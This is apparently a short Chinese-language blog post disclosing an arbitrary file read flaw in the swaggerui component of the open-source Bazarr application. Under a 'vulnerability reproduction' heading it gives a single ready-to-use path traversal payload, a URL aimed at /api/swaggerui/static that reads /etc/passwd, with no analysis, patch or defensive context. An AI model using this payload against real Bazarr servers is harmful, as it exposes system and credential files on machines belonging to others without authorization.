Babing
Published on 2024-08-30 / 1 Visits
0
0

K23-1开源-Bazarrswaggerui组件-任意文件读取

K23-1开源-Bazarrswaggerui组件-任意文件读取

漏洞复现:

payload:

http://IP/api/swaggerui/static/././././././././etc/passwd

Comment